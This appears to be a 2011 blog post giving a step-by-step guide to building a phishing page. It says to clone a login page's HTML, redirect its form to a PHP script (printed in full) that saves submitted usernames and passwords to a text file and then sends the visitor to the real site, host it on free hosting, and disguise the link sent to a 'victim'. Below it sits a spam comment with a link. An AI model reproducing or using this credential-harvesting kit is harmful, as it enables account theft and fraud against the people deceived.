Thursday, May 5, 2011

how to creat phishing page


1) Open the site whose webpage you want to make a copy of.

2) If you are using internet explorer then right click and select view source and if you use Mozilla firefox then right click and select view page source.

3) copy the html code to a notepad and find the word action using the shortcut ctrl+f

4) now change the website name there to post.php and save the file as Index.htm

5) now open another notepad and type the following into it:

header(‘Location: type original site name here’);
$handle = fopen(”usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

6) in the location part of the php type the original site name e.g:-www.facebook.com

7) now save the file as post.php
  8) find a free webhosting site which offers php hosting.
My preference goes to www.ripway.com and www.x10hosting.com

9) create free account in them and upload the two files.

10) Now you will get a link from them which looks exactly like the site you wanted to phish. Give that link to your victim but disguise it with a word so that he won’t find it as a duplicate site.

11) There you go. The moment he enters his login details, he will be redirected to the original site which asks him to enter his details again. Then he will be able to login.

12) To see his username and password login in to your webhosting site and open the file usernames.txt.

3 comments:

  1. The moment he goes into his sign in information, he will be rerouted to the unique website which demands him to get into his information again. Then he will be able to sign in. To see his information sign in in to your web hosting website and open the computer file usernames.

    http://howtoretireplan.com

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete